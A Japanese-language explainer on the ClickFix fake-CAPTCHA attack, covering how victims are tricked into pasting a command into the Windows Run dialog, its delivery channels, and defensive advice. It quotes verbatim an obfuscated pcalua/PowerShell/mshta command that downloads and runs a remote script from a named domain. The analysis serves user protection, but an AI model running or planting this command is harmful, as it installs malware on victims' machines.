ClickFix Captcha マルウェア攻撃の理解

ClickFix Captcha マルウェア攻撃の理解

The ClickFix Attack Vector

「ClickFix」攻撃は、技術的な修正またはセキュリティ検証を装って、悪意のある行為者がユーザー自身のマシンでコードを手動で実行させるソーシャルエンジニアリング技術です。Hacker News で報告された最近のインシデントでは、正規のニュースブログを訪れたユーザーが、人間であることを証明するために「手動検証ステップ」を要求する偽の CAPTCHA ページに遭遇しました。

これらの手順は通常、ユーザーに次のように指示します:

  1. Win + R を押す(Windows の Run ダイアログを開く)。
  2. Ctrl + V を押してから Enter を押す(クリップボードからコマンドを貼り付けて実行する)。

この方法は、ユーザーにブラウザー環境外でコードを実行するよう明示的に指示されるため、従来のブラウザーセキュリティサンドボックスを回避するために使用されます。これにより、マルウェアにオペレーティングシステムへの管理者またはユーザーレベルのアクセスが実際に付与されます。

悪意のあるペイロードの分析

報告されたケースでは、ユーザーのクリップボードにコピーされたペイロードは、リモートスクリプトをダウンロードして実行するように設計された PowerShell コマンドでした:

pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi"

この攻撃の技術的分析により、いくつかの高度な特徴が明らかになりました:

  • Obfuscation: このコマンドは、キャレット記号 (^) を使用して URL とコマンド文字列を難読化し、シンプルなパターンマッチングベースのセキュリティツールによる検出を困難にします。
  • Dynamic Delivery: フィッシングページは、srcDoc を通じて作成された iframe を介して頻繁に配信され、これにより一部のスキャナーから悪意のあるコンテンツを隠すことができます。
  • Blockchain-Based Execution: この攻撃の一部のバージョンは非常に複雑で、Ethereum または Base スマートコントラクトから JavaScript スクリプトを取得して実行し、これにより攻撃者は持続的かつ分散型のコマンド・アンド・コントロール (C2) インフラストラクチャを維持することができます。
  • Persistence: 攻撃は LocalStorage を利用して、ページ読み込み時に評価されるスクリプトを保存する可能性があり、これにより初期のドロッパーが実行された後でもマルウェアが持続することを確保します。

一般的な配信方法

これらの攻撃は、侵害された正規のウェブサイトを通じて頻繁に配信され、多くの場合、WordPress などのハッキングされたコンテンツ管理システム (CMS) または悪意のある広告 (malvertising) を介して行われます。ユーザーは、以前に何度も訪れたブログやニュースサイトでこれらの偽の CAPTCHA に遭遇することがあり、これにより攻撃がより信頼できるように見えます。

その他の攻撃ベクトルには次のものがあります:

  • SEO Poisoning: 検索エンジン結果の上部に表示される悪意のあるリンクは、時々公式ソフトウェアのダウンロードとして偽装されていることがあります(例:偽の Claude AI インストーラー)。
  • Compromised Browser Extensions: 広範な権限を持つ悪意のある拡張機能は、ユーザーが訪れるどのページにもこれらのフィッシングフレームを注入することができます。

自分を守る方法

CAPTCHA または任意のウェブサイト検証プロセスが、Windows の Run ダイアログまたはターミナルを介してコードを実行するよう要求する正当な理由はありません。ウェブサイトが「人間であることを確認する」ためにコマンドの実行を求める場合、それは詐欺です。

即時の防御アクション

  • コマンドを決して実行しないでください。ウェブサイトが提供するコマンドをシステムターミナルまたは Run ダイアログで実行しないでください。
  • フィッシングドメインを報告するようにしてください。Google Safe Browsing などのサービスに報告し、疑わしいファイルや URL を VirusTotal にアップロードしてください。

長期的なセキュリティレイヤー

  • 広告ブロッカーを使用する:uBlock Origin などのツールは、これらの攻撃を配信するために使用される悪意のあるスクリプトや広告ネットワークの多くをブロックできます。
  • DNS フィルタリング:セキュリティに特化した DNS プロバイダー(例:Quad9)またはブロックリストを持つローカル リゾルバー(例:Pi-hole)を使用すると、既知の悪意のあるドメインへのブラウザーの接続を防ぐことができます。
  • エンドユーザーの警戒心:異常なブラウザーの動作に対して懐疑的な姿勢を保ちます。サイトがシステムレベルの権限または手動でのコマンド実行を要求する場合、それをセキュリティの脅威として扱ってください。

Sources